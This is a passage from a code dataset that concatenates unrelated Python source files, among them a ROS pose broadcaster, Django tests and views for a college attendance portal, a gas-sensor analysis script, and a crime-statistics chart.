ros\nimport rospy\nimport tf\nimport tf2_ros\nimport std_msgs\nfrom geometry_msgs.msg import PoseStamped, Twist, Pose\nfrom std_msgs.msg import Header\n# other\nimport yaml\n\n\nclass gt_pose_broadcaster:\n def __init__(self):\n rospy.init_node('gt_pose_broadcaster', anonymous=True)\n rate = rospy.Rate(60)\n ns = rospy.get_param('~ns')\n gt_poses_to_broadcast_yaml = rospy.get_param('~gt_poses_to_broadcast_yaml')\n\n # create tf publisher & timer\n self.wfb = tf2_ros.TransformBroadcaster()\n self.gt_obs = []\n with open(gt_poses_to_broadcast_yaml, 'r') as stream:\n try:\n gt_poses = list(yaml.load_all(stream))\n print(\"broadcasting gt pose for {} objects\".format(len(gt_poses)))\n for gt_object_dict in gt_poses:\n obj_ns = gt_object_dict[\"ns\"]\n topic = \"/{}/mavros/vision_pose/pose\".format(obj_ns)\n p = Pose()\n p.position.x = gt_object_dict[\"x\"]\n p.position.y = gt_object_dict[\"y\"]\n p.position.z = gt_object_dict[\"z\"]\n p.orientation.x = gt_object_dict[\"qx\"]\n p.orientation.y = gt_object_dict[\"qy\"]\n p.orientation.z = gt_object_dict[\"qz\"]\n p.orientation.w = 
gt_object_dict[\"qw\"]\n frame = self.frame_from_pose(p, child_frame_id=obj_ns)\n h = std_msgs.msg.Header()\n h.stamp = rospy.Time.now()\n # print(h.stamp)\n h.frame_id = \"world\"\n ps = PoseStamped()\n ps.header = h\n ps.pose = p\n publisher = rospy.Publisher(topic, PoseStamped, queue_size=1)\n self.gt_obs.append((p, ps, frame, publisher))\n except yaml.YAMLError as exc:\n print(exc)\n\n # pdb.set_trace()\n \n while not rospy.is_shutdown():\n self.publish_gts()\n rate.sleep()\n\n def publish_gts(self):\n for p, ps, frame, publisher in self.gt_obs:\n publisher.publish(ps)\n # print(ps)\n\n\n def frame_from_pose(self, pose, child_frame_id, parent_frame_id='world'):\n frame = tf2_ros.TransformStamped()\n frame.header.frame_id = parent_frame_id\n frame.child_frame_id = child_frame_id\n frame.header.stamp = rospy.Time.now()\n\n frame.transform.translation.x = pose.position.x\n frame.transform.translation.y = pose.position.y\n frame.transform.translation.z = pose.position.z\n frame.transform.rotation.x = pose.orientation.x\n frame.transform.rotation.y = pose.orientation.y\n frame.transform.rotation.z = pose.orientation.z\n frame.transform.rotation.w = pose.orientation.w\n return frame\n\nif __name__ == '__main__':\n np.set_printoptions(linewidth=160, suppress=True) # format numpy so printing matrices is more clear\n try:\n program = gt_pose_broadcaster()\n except:\n import traceback\n traceback.print_exc()\n print(\"--------------- FINISHED gt pose broadcaster---------------\")\n\n\n","repo_name":"StanfordMSL/MSL-RAPTOR","sub_path":"src/utils_msl_raptor/gt_pose_broadcaster.py","file_name":"gt_pose_broadcaster.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"70394780485","text":"\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [(\"ms_products\", \"0001_initial\")]\n\n operations = [\n migrations.AlterField(\n model_name=\"product\", name=\"extra_metadata\", field=models.JSONField(blank=True, default=list)\n )\n ]\n","repo_name":"K-Wojciechowski/mobishopper-web","sub_path":"ms_products/migrations/0002_extra_meta_blank.py","file_name":"0002_extra_meta_blank.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"2339479547","text":"from PIL import Image\nimport numpy as np\nimport os\n\nsplit = \"validation\"\npath_to_masks = split+\"/Semantic/\"\npath_to_edited = split+\"/Semantic_palette/\"\nos.makedirs(path_to_edited, exist_ok=True)\n\nsrc_palette = Image.open(\"all_palette.png\")\nsrc_palette = src_palette.convert(\"P\", palette=Image.ADAPTIVE)\n\nimages = [x for x in os.listdir(path_to_masks) if \".\" in x]\nfor name in images:\n img = Image.open(path_to_masks+name).quantize(palette=src_palette)\n img.save(path_to_edited+name)","repo_name":"GhadeerElmkaiel/dataset_structure","sub_path":"useful code/convert_images_to_palette.py","file_name":"convert_images_to_palette.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"19431911638","text":"import os\r\nimport cv2\r\nimport face_recognition as recog\r\nimport pickle\r\n\r\nstarting_dir = 'C:/Users/amans/Documents/AI_python/demo_images/known'\r\n\r\ndata = []\r\n\r\nfor root, dirs, files in os.walk(starting_dir):\r\n print(\"You are in the directory: {}\".format(root))\r\n 
print(\"Folders in the directory: {}\".format(dirs))\r\n print(\"FIles in the directory: {}\".format(files))\r\n\r\n for file in files:\r\n full_path = starting_dir + '/' + file\r\n picture = recog.load_image_file(full_path)\r\n pictureBGR = cv2.cvtColor(picture, cv2.COLOR_RGB2BGR) # This is becasue .jpg are saved in the RBG colour space and CV\r\n name = file[:-4]\r\n # wants BGR\r\n face_encoding = recog.face_encodings(pictureBGR)[0]\r\n data.append([name, face_encoding])\r\n\r\nwith open('my_data.pkl', 'wb') as md:\r\n pickle.dump(data, md)\r\n","repo_name":"amansoo/Homework_Solutions","sub_path":"AI_series/openCV_13_HW_PT_1.py","file_name":"openCV_13_HW_PT_1.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"31435471778","text":"from blazeweb.globals import ag, settings\nfrom blazeweb.testing import TestApp\nfrom nose.tools import eq_\n\nfrom authbwc.lib.testing import login_client_with_permissions\nfrom commonbwc.lib.testing import has_message\nfrom compstack.sqlalchemy import db\nfrom basebwa_ta.model.orm import Widget\n\n\nclass TestCrud(object):\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n\n def create_widget(self, widget_type, color, quantity):\n w = Widget(widget_type=widget_type, color=color, quantity=quantity)\n db.sess.add(w)\n db.sess.commit()\n return w\n\n def test_add(self):\n r = self.ta.get('/widget/add/999999', status=400)\n\n r = self.ta.get('/widget/add')\n d = r.pyq\n eq_(d('form:first').attr('id'), 'widget-form', r)\n assert d('h2').text() == 'Add Widget'\n assert d('form#widget-form').attr.action == '/widget/add'\n assert d('span#widget-form-cancel a').attr.href == '/widget/manage'\n\n r.form['widget_type'] = 'Type A'\n r.form['color'] = 'silver'\n r = r.form.submit('submit', status=200)\n assert '/widget/add' in r.request.url\n\n r.form['quantity'] = '87'\n r = r.form.submit('submit', status=302)\n assert '/widget/add' in r.request.url\n r = r.follow(status=200)\n assert '/widget/manage' in r.request.url\n\n def test_edit(self):\n r = self.ta.get('/widget/edit', status=404)\n r = self.ta.get('/widget/edit/999999', status=404)\n\n w_id = self.create_widget(u'edit_test_widget', u'black', 150).id\n r = self.ta.get('/widget/edit/%s' % w_id)\n d = r.pyq\n eq_(d('form:first').attr('id'), 'widget-form', r)\n assert d('form#widget-form').attr.action == '/widget/edit/%s' % w_id\n assert d('h2').text() == 'Edit Widget'\n assert d('input[name=\"widget_type\"]').val() == 'edit_test_widget'\n assert d('input[name=\"color\"]').val() == 'black'\n assert d('input[name=\"quantity\"]').val() == '150'\n\n r.form['quantity'] = '75'\n r = r.form.submit('submit', status=302)\n assert '/widget/edit/%s' % w_id in r.request.url\n r = r.follow(status=200)\n assert '/widget/manage' in r.request.url\n\n w = Widget.get(w_id)\n assert w.quantity == 75\n\n def test_manage(self):\n r = self.ta.get('/widget/manage/999999', status=400)\n r = self.ta.post('/widget/manage', status=400)\n\n w_id = self.create_widget(u'manage_test_widget', u'black', 150).id\n\n r = self.ta.get('/widget/manage?filteron=type&filteronop=eq&filterfor=manage_test_widget')\n d = r.pyq\n assert d('form#widget-form').html() is None\n assert d('h2:eq(0)').text().startswith('Manage Widgets')\n assert d('p a').eq(0).attr.href.startswith('/widget/add')\n assert d('a[href^=\"/widget/edit/%s\"]' % w_id).html() is not None\n assert d('a[href^=\"/widget/delete/%s\"]' % w_id).html() is not None\n\n 
def test_delete(self):\n r = self.ta.get('/widget/delete', status=404)\n r = self.ta.get('/widget/delete/999999', status=404)\n\n w_id = self.create_widget(u'delete_test_widget', u'black', 150).id\n r = self.ta.post('/widget/delete/%s' % w_id, status=400)\n r = self.ta.get('/widget/delete/%s' % w_id, status=302)\n assert '/widget/delete/%s' % w_id in r.request.url\n\n r = r.follow(status=200)\n assert '/widget/manage' in r.request.url\n\n w = Widget.get(w_id)\n assert w is None\n\n def test_bad_action(self):\n self.ta.get('/widget/badaction', status=404)\n self.ta.get('/widget/badaction/999999', status=404)\n\n def test_delete_protect(self):\n w_id = self.create_widget(u'delete_protect_test_widget', u'black', 150).id\n\n r = self.ta.get('/widget-auth/manage?filteron=type&filteronop=eq&'\n 'filterfor=delete_protect_test_widget')\n d = r.pyq\n assert d('a[href^=\"/widget-auth/edit/%s\"]' % w_id).html() is not None\n assert d('a[href^=\"/widget-auth/delete/%s\"]' % w_id).html() is None\n r = self.ta.get('/widget-auth/delete/%s' % w_id, status=403)\n\n login_client_with_permissions(self.ta, u'widget-delete')\n r = self.ta.get('/widget-auth/manage?filteron=type&filteronop=eq&'\n 'filterfor=delete_protect_test_widget')\n d = r.pyq\n assert d('a[href^=\"/widget-auth/edit/%s\"]' % w_id).html() is not None\n assert d('a[href^=\"/widget-auth/delete/%s\"]' % w_id).html() is not None\n r = self.ta.get('/widget-auth/delete/%s' % w_id, status=302)\n self.ta.get('/users/logout')\n\n\nclass TestFormErrors(object):\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n\n def test_required(self):\n r = self.ta.get('/widget/add')\n r.form['widget_type'] = 'Type A'\n r.form['color'] = 'silver'\n r = r.form.submit('submit', status=200)\n d = r.pyq\n assert has_message(d, 'error', 'Quantity: field is required')\n\n def test_maxlength(self):\n r = self.ta.get('/widget/add')\n r.form['widget_type'] = ''.join(['a' for i in range(260)])\n r.form['color'] = 'silver'\n r.form['quantity'] = 125\n r = r.form.submit('submit', status=200)\n d = r.pyq\n assert has_message(d, 'error', 'Type: Enter a value not greater than 255 characters long')\n\n\nclass TestAdminTemplating(object):\n\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n settings.template.admin = 'admin.html'\n\n def test_primary_content_block(self):\n r = self.ta.get('/admin-templating/pc-block')\n assert 'pc content' in r\n\n\nclass TestDefaultTemplating(TestAdminTemplating):\n\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n settings.template.admin = 'default.html'\n\n\nclass TestDynamicControlPanel(object):\n\n @classmethod\n def setup_class(cls):\n cls.ta = TestApp(ag.wsgi_test_app)\n login_client_with_permissions(cls.ta, (u'webapp-controlpanel', u'auth-manage'))\n\n def test_panel(self):\n r = self.ta.get('/control-panel')\n assert r.status == '200 OK'\n expected = ''.join(\"\"\"\n
\n

Users

\n \n \n \n
\"\"\".split())\n assert expected in ''.join(r.body.decode().split())\n","repo_name":"blazelibs/basebwa","sub_path":"basebwa_ta/tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71133133766","text":"import csv\nimport random\nimport operator\nimport numpy as np\nclass Gases:\n def __init__(self, sample=None, ammonia = None ,cyclohexanone= None,acetone = None,ethanol = None,methanol =None ,sensor_1 = None,\n sensor_2 = None,sensor_3 = None,sensor_4 = None):\n self.sample = sample\n self.ammonia = ammonia\n self.cyclohexanone = cyclohexanone\n self.acetone =acetone\n self.ethanol = ethanol\n self.methanol = methanol\n self.sensor_1 = sensor_1\n self.sensor_2 = sensor_2\n self.sensor_3 = sensor_3\n self.sensor_4 = sensor_4\n\ndef read_file():\n sensor_1 = []\n sensor_2 =[]\n sensor_3 =[]\n sensor_4 =[]\n gas_list =[]\n gas_sensor_1 =[]\n gas_sensor_2 =[]\n gas_sensor_3 =[]\n gas_sensor_4 =[]\n gas_conc=[]\n\n\n with open('combined.txt', 'r') as data:\n header = next(data)\n header =header.strip()\n for reading in csv.reader(data, delimiter=\",\"):\n reading = [float(i) for i in reading]\n gas_list.append(Gases(reading[0],reading[1],reading[2],reading[3],reading[4],reading[5],reading[6]\n ,reading[7],reading[8],reading[9]))\n sensor_1.append(reading[6])\n sensor_2.append(reading[7])\n sensor_3.append(reading[8])\n sensor_4.append(reading[9])\n print(header)\n count_1 = 0\n for entry in gas_list:\n if entry.sample == 1.0 or entry.sample == 2.0 or entry.sample == 3.0 or entry.sample == 4.0 or \\\n entry.sample == 6.0 or entry.sample == 10.0:\n gas_sensor_1.append(entry.sensor_1)\n gas_sensor_2.append(entry.sensor_2)\n gas_sensor_3.append(entry.sensor_3)\n gas_sensor_4.append(entry.sensor_4)\n gas_conc.append(entry.ammonia)\n count_1 += 1\n sensor_main = gas_sensor_1 + gas_sensor_2 + gas_sensor_3 + gas_sensor_4\n gas_main = gas_conc\n gas_sensor_1 =[]\n gas_sensor_2=[]\n gas_sensor_3 =[]\n gas_sensor_4=[]\n gas_conc = []\n count =0\n for entry in gas_list:\n if entry.sample == 1.0 or entry.sample == 7.0 or entry.sample == 10.0:\n gas_sensor_1.append(entry.sensor_1)\n gas_sensor_2.append(entry.sensor_2)\n gas_sensor_3.append(entry.sensor_3)\n gas_sensor_4.append(entry.sensor_4)\n gas_conc.append(entry.cyclohexanone)\n count += 1\n sensor_main = sensor_main + gas_sensor_1 + gas_sensor_2 + gas_sensor_3 + gas_sensor_4\n\n\n\n gas_main = gas_main + gas_conc\n index = count_1 * 4\n gas1_sensor = sensor_main[:index]\n gas2_sensor = sensor_main[index:]\n gas_1= gas_main[:count_1]\n gas_2 =gas_main[count_1:]\n gas_2 = np.array(gas_2)\n gas_1 = np.array(gas_1)\n gas1_sensor = np.array_split(np.array(gas1_sensor), 4)\n gas2_sensor = np.array_split(np.array(gas2_sensor), 4)\n for i in range(4):\n print(np.corrcoef(gas1_sensor[i],gas_1)[0,1])\n for i in range(4):\n print(np.corrcoef(gas2_sensor[i],gas_2)[0,1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass Report:\n def __init__(self, g=None, s = None ,status= None,r = None,sig =\n None ,m = None,c = None,):\n self.g = g\n self.s = s\n self.status = status\n self.r = r\n self.sig = sig\n self.m = m\n self.c = c\n\n\n\ndef populate():\n with open(\"gas_Sensor.csv\", \"w\") as file:\n writer = csv.writer(file)\n for s in range(100):\n for g in range(100):\n r = 0.4 + random.random()/2\n rand = random.random()\n if rand < 0.1:\n writer.writerow ((\"{}{}\".format(\"Gas\", g), \"{}{}\".format(\"Sensor\", 
s), \"Yes\",r,0.001,\n random.random()/500,20*random.random()))\n\n elif rand < 0.5:\n writer.writerow((\"{}{}\".format(\"Gas\", g), \"{}{}\".format(\"Sensor\", s), \"No\", 0, 0, 0, 0))\n file.close()\n\n\ndef load_report():\n r_lst = []\n with open(\"gas_Sensor.csv\", \"r\",) as report:\n r_reader = csv.reader(report, delimiter=',')\n sort = sorted(r_reader,reverse=True, key=operator.itemgetter(3))\n for row in sort:\n r_lst.append(Report(row[0],row[1],row[2],row[3],row[4],row[5],row[6]))\n report.close()\n return r_lst\n\n\ndef report():\n sensor_list=[]\n desired_gas =input(\"Enter Desired Gas\")\n with open(\"Sensor_report.csv\", 'w') as new_gas_report:\n r_writer = csv.writer(new_gas_report)\n gas_list =load_report()\n for item in gas_list:\n if item.g == desired_gas and item.status == \"Yes\":\n r_writer.writerow([item.g, item.s, item.status,item.r,item.sig,item.m,item.c])\n sensor_list.append(Report(item.g, item.s, item.status,item.r, item.sig, item.m,item.c))\n return sensor_list\n\n\ndef find_sensor(sensor_list):\n unwanted_gas = [(x) for x in\n input(\"Enter Unwanted Gases' name and include a space if adding multiple.: \").split()]\n gas_X = sensor_list\n bad_gases =load_report()\n for item in bad_gases:\n for gases in unwanted_gas:\n for items in gas_X:\n if item.g == gases and item.status == \"Yes\" and item.s == items.s:\n gas_X.remove(items)\n\n return sensor_list\n\n\n\n\n\n\ndef write_report():\n with open(\"Sensor_with_no_unwanted_gases_Report.csv\", 'w') as new_gas_report3:\n r_writer = csv.writer(new_gas_report3)\n sensor_list = report()\n sensor_list = find_sensor(sensor_list)\n for item in sensor_list:\n r_writer.writerow([item.g, item.s, item.status, item.r, item.sig, item.m, item.c])\n\n\n\ndef y_value(sensor_list):\n m =[]\n c =[]\n r =[]\n y = []\n y_max =[]\n s = [\"Sensor6\",\"Sensor45\",\"Sensor46\"]\n g =[\"Gas69\"]\n for sensors in s:\n for gases in g:\n for i in sensor_list:\n if i.s == sensors and i.g == gases:\n m.append(i.m)\n c.append(i.c)\n r.append(i.r)\n m_f = [float(x) for x in m]\n c_f = [float(z) for z in c]\n r_f = [float(a) for a in r]\n for i, x in zip( m_f, c_f):\n y.append(i * 2 + x)\n for i, z in zip(y,r_f):\n y_max.append(i + z)\n\ndef test_correlation():\n x_array = [56, 56, 65, 65, 50, 25, 87, 44, 45]\n y_array = [87, 91, 85, 91, 75, 28, 122, 66, 58]\n print(np.corrcoef(x_array, y_array)[0, 1])\n\ns = load_report()\nhello = y_value(s)\nread_file()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef high_low(sensor_value):\n high = 0\n low = 1000000000000000\n for i in sensor_value:\n if i > high:\n high = i\n if i < low:\n low = i\n return high,low\n\n\ndef test_h_l(lst):\n highest_value , _ = high_low(lst)\n _, lowest_value = high_low(lst)\n print( \"Max is:\" + str(highest_value), \"Min is:\" + str(lowest_value))\n\n\n\n","repo_name":"thedoctor2016/Project","sub_path":"Analysis.py","file_name":"Analysis.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27173548718","text":"from typing import List\n\nclass Solution:\n visited = []\n def numIslands(self, grid: List[List[str]]) -> int:\n self.visited = []\n h, w = len(grid), len(grid[0])\n for i in range(0, h):\n v = []\n for j in range(0, w):\n v.append(0)\n self.visited.append(v)\n\n answer = 0\n for i in range(0, h):\n for j in range(0, w):\n if grid[i][j] == \"1\" and self.visited[i][j] == 0:\n self.find(j, i, grid, h, w)\n answer += 1\n\n 
return answer\n\n def find(self, x, y, grid, h, w):\n off = [[0, 1], [1, 0], [0, -1], [-1, 0]]\n if self.visited[y][x] == 0:\n self.visited[y][x] = 1\n for i in range(4):\n dy, dx = y + off[i][0], x + off[i][1]\n if 0 <= dy < h and 0 <= dx < w:\n if self.visited[dy][dx] == 0 and grid[dy][dx] == \"1\":\n self.find(dx, dy, grid, h, w)\n\ns = Solution()\np = s.numIslands([[\"1\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"1\",\"0\"],[\"1\",\"1\",\"0\",\"0\",\"0\"],[\"0\",\"0\",\"0\",\"0\",\"0\"]])\nprint(p)","repo_name":"kingjakeu/OneHunnitChallenge","sub_path":"leetcode/medium/Q200_NumberofIslands.py","file_name":"Q200_NumberofIslands.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33763220197","text":"\nimport matplotlib.pyplot as plt \nimport pandas as pd \nfrom top_crime_spots import t_10 \n\ndef display_top_10_crime_spots(t10: pd.Series) -> None:\n\n spots = t10.index.tolist()\n values = t10.values.tolist()\n\n values[:] = values[::-1]\n spots[:] = spots[::-1]\n\n temp_bar_color = '#ffb4b4'\n bg_color = '#292c2c'\n text_color = '#fdf7c3'\n text_color_sub = '#5f4e4e'\n\n fig, ax = plt.subplots()\n plt.barh(spots, values, color=temp_bar_color)\n\n fig.patch.set_facecolor(bg_color)\n ax.set_facecolor(bg_color)\n\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['left'].set_color(text_color_sub)\n ax.spines['bottom'].set_color(text_color_sub)\n\n plt.suptitle(\n 'TOP 10 LOS ANGELES CRIME SPOTS SINCE 2020',\n fontfamily = 'Russo One',\n fontsize = 18,\n color = temp_bar_color\n )\n\n plt.title(\n '*source https://catalog.data.gov/dataset/crime-data-from-2020-to-present',\n fontfamily = 'Russo One',\n color = text_color_sub\n )\n\n plt.xlabel(\n 'TOTAL CRIMES COMMITED',\n fontfamily = 'Russo One',\n fontsize = 12.5,\n color = text_color_sub\n )\n\n for index, value in enumerate(values):\n plt.text(\n value,\n index, \n str(value),\n ha = 'center',\n position = (value-40, index-0.1),\n fontweight = 'bold',\n color = bg_color,\n fontsize = 15\n )\n\n plt.xticks(color=text_color_sub)\n plt.yticks(color=text_color)\n plt.show()\n\ndisplay_top_10_crime_spots(t_10)","repo_name":"sasadjukic/century_city_california_mall_crime","sub_path":"la_metro_area/top_crime_spots_chart.py","file_name":"top_crime_spots_chart.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71965833604","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.db.models import Min, Max, Sum\nfrom .models import Hod_credential, Course, Semester_wise_course, Course_allot, Semester_wise_electives\nfrom faculty.models import FacultyProfile, attendance\nfrom student.models import StudentProfile\nfrom datetime import date\n\n\ndef index(request):\n if request.method == \"POST\":\n username_entered = request.POST.get('username')\n password_entered = request.POST.get('password')\n if authenticate(username_entered, password_entered):\n hod_login(request)\n return redirect('hod_dashboard')\n else:\n return render(request, 'HOD/hod_index.html',{'invalid_cred':'Invalid credentials!'})\n else:\n if not request.session.get('logged'):\n return render(request, 'HOD/hod_index.html',{})\n user_type = request.session.get('user_type')\n if user_type != 'HOD':\n return redirect('home')\n else:\n return 
redirect('hod_dashboard')\n\n\ndef dashboard(request):\n if _hod_is_logged(request):\n semesters = _get_semesters(request)\n return render(request,'HOD/hod_home.html',{'sem':semesters})\n else:\n return redirect('home')\n\n\ndef course_settings(request,semester=None):\n if not _hod_is_logged(request):\n return redirect('home')\n \n if request.method == 'GET':\n if semester is None:\n return redirect('hod_dashboard')\n else:\n batch = date.today().year - semester//2\n semesters = _get_semesters(request)\n active_username = request.session.get('username')\n hod_instance = Hod_credential.objects.get(hod_id=active_username)\n department = hod_instance.department\n faculty_group = FacultyProfile.objects.all()\n faculties = []\n courses = []\n try:\n course_codes = Semester_wise_course.objects.get(semester=semester, department=department).courses.split('-')\n if semester > 4:\n try:\n course_codes += Semester_wise_electives.objects.get(department=department, semester=semester, year=date.today().year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n for faculty in faculty_group:\n faculties.append({'id':faculty.faculty_id, 'name':faculty.name})\n for code in course_codes:\n try:\n course = Course.objects.get(course_code=code)\n courses.append({'code': course.course_code, 'title':course.title})\n except Course.DoesNotExist:\n pass\n except Semester_wise_course.DoesNotExist:\n pass\n data = {'courses': courses, 'faculties':faculties,'sem':semesters, 'batch':batch, 'semester':semester}\n return render(request, 'HOD/course_setting.html', data)\n else:\n return redirect('course_settings', semester=semester)\n\n\ndef view_courses(request):\n if not _hod_is_logged(request):\n return redirect('home')\n \n semesters = _get_semesters(request)\n username = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=username).department\n if request.method == 'POST':\n selected_batch = request.POST.get('select_batch')\n batch_filter = _get_batches_filter(selected=selected_batch)\n selected_semester = request.POST.get('select_semester')\n semester_filter = _get_semesters_filter(request, selected=selected_semester)\n course_allotment = Course_allot.objects.filter(year=selected_batch, department=department, semester=int(selected_semester))\n course_mapping = _get_course_map(course_allotment)\n if len(course_mapping) == 0:\n no_course = True\n else:\n no_course = False\n template_data = {'sem': semesters, 'courses':course_mapping, 'batch_filter':batch_filter, 'semester_filter':semester_filter, 'no_course':no_course}\n return render(request, 'HOD/course_view.html', template_data)\n else:\n batch_filter = _get_batches_filter(selected=None)\n semester_filter = _get_semesters_filter(request, selected=None)\n template_data = {'sem': semesters, 'batch_filter':batch_filter, 'semester_filter':semester_filter}\n return render(request, 'HOD/course_view.html', template_data)\n\n\ndef attendance_modifier(request):\n if not _hod_is_logged(request):\n return redirect('home')\n \n semesters = _get_semesters(request)\n if request.method == 'POST':\n if 'att_data_submit_btn' in request.POST:\n reg_no_to_modify = request.POST.get('hod_attend_edit_reg_no')\n start_date_entered = request.POST.get('hod_attend_edit_start_date')\n end_date_entered = request.POST.get('hod_attend_edit_end_date')\n print(reg_no_to_modify, start_date_entered, end_date_entered)\n if _modify_attendance_for_student(reg_no_to_modify, start_date_entered, end_date_entered):\n status = 'Attendance modified 
successfully'\n else:\n status = 'Failed to modify attendance'\n attendance_data = dict()\n try:\n student = StudentProfile.objects.get(reg_no=reg_no_to_modify)\n attendance_data = _get_attendance_data_for_student(student)\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'attendance':attendance_data, 'status':status})\n except StudentProfile.DoesNotExist:\n #messages.error(request, 'Failed to modify attendance')\n return redirect('attendance_modifier')\n\n elif 'att_mod_filter_btn' in request.POST:\n reg_no_entered = request.POST.get('hod_attend_edit_regno')\n attendance_data = dict()\n if len(reg_no_entered) != 10 or (not reg_no_entered.isdigit()):\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'invalid_reg':True})\n try:\n student = StudentProfile.objects.get(reg_no=reg_no_entered)\n attendance_data = _get_attendance_data_for_student(student)\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'attendance':attendance_data})\n except StudentProfile.DoesNotExist:\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters, 'not_found':True})\n else:\n return redirect('attendance_modifier')\n else:\n return render(request, 'HOD/hod_attend_edit.html', {'sem': semesters})\n\n\ndef view_student_attendance_semester_wise(request, sem=None, reg_no=None):\n notLoggedAccessPageContent = \"\"\"\n You must login as HOD to see this page.\n
\n \n \"\"\"\n\n if not _hod_is_logged(request):\n return HttpResponse(notLoggedAccessPageContent)\n\n template_data = dict()\n if sem is None or reg_no is None:\n return redirect('attendance_viewer')\n else:\n try:\n student = StudentProfile.objects.get(reg_no=reg_no)\n except StudentProfile.DoesNotExist:\n template_data['invalid_reg'] = True\n return render(request, 'HOD/hod_attend_view_student.html', template_data)\n\n logged_username = request.session.get('username')\n try:\n hod = Hod_credential.objects.get(hod_id=logged_username)\n if student.department != hod.department:\n template_data['invalid_reg'] = True\n else:\n course_year = str(int(reg_no[:4])+ (sem//2))\n courses = Semester_wise_course.objects.get(department=student.department, semester=sem).courses.split('-')\n if sem > 4:\n try:\n courses += Semester_wise_electives.objects.get(department=student.department, semester=sem, year=course_year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n \n att_data_list = [] # using list of dictionaries to store attendance \n for course_code in courses:\n total = attendance.objects.filter(reg_no=student, course_code=course_code).aggregate(total_classes=Sum('no_of_classes')).get('total_classes')\n total = total if total is not None else 0\n present = attendance.objects.filter(reg_no=student, course_code=course_code, attendance='P').aggregate(classes_present=Sum('no_of_classes')).get('classes_present')\n present = present if present is not None else 0\n\n if total != 0:\n percent_present = (present/total)*100\n else:\n percent_present = 0.0\n less_attendance = False\n if percent_present < 75:\n less_attendance = True\n att_data = {'course_code':course_code, 'total_classes':total, 'attended':present, 'percent':percent_present, 'less_attend':less_attendance}\n att_data_list.append(att_data)\n template_data['user_instance'] = student\n template_data['att_data_list'] = att_data_list\n template_data['stu_sem'] = sem\n return render(request, 'HOD/hod_attend_view_student.html', template_data)\n\n except Hod_credential.DoesNotExist:\n return redirect('attendance_viewer')\n\n\ndef attendance_viewer(request):\n semesters = _get_semesters(request)\n department = Hod_credential.objects.get(hod_id=request.session.get('username')).department\n if request.method == 'POST':\n selected_batch = request.POST.get('select_batch')\n selected_semester = request.POST.get('select_semester')\n if selected_batch == '' or selected_semester == '':\n return redirect('attendance_viewer')\n \n this_semester = (date.today().year - int(selected_batch))*2\n if date.today().month >= 7:\n this_semester += 1\n\n batch_filter = _get_batches_filter(selected=selected_batch)\n semester_filter = _get_semesters_filter(request, selected=selected_semester)\n attendance_data = _get_attendance_data_for_batch(department, batch=selected_batch, semester=selected_semester)\n \n template_data = {'sem': semesters, 'batch_filter':batch_filter, 'semester_filter':semester_filter, 'attendance':attendance_data, 'selected_semester':selected_semester}\n return render(request, 'HOD/hod_attend_view.html', template_data)\n else:\n batch_filter = _get_batches_filter(selected=None)\n semester_filter = _get_semesters_filter(request, selected=None)\n template_data = {'sem': semesters, 'batch_filter':batch_filter, 'semester_filter':semester_filter, 'freshpage':True}\n return render(request, 'HOD/hod_attend_view.html', template_data)\n\n\ndef allot_courses(request):\n if request.method == 'POST':\n print(\"Received 
allotment\")\n batch = request.POST.get('allotment_batch')\n course_semester = int(request.POST.get('allotment_semester'))\n course_department = Hod_credential.objects.get(hod_id=request.session.get('username')).department\n course_map = _parse_course_mapping(request)\n print(course_map)\n for course_code, faculty_id in course_map.items():\n course_instance = Course.objects.get(course_code=course_code.upper())\n faculty_instance = FacultyProfile.objects.get(faculty_id=faculty_id.upper())\n try:\n allotment_object = Course_allot.objects.get(year=batch, department=course_department, course_code=course_instance,semester=course_semester)\n allotment_object.faculty_id = faculty_instance\n allotment_object.save()\n except Course_allot.DoesNotExist:\n allotment_object = Course_allot.objects.create(year=batch, department=course_department, course_code=course_instance, faculty_id=faculty_instance, semester=course_semester)\n allotment_object.save()\n messages.success(request, \"Course allotment has been saved.\")\n return redirect('course_settings', semester=course_semester)\n else:\n return redirect('hod_dashboard')\n\n\ndef _get_semesters(request):\n current_hod = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=current_hod).department\n if department == 'SH':\n return 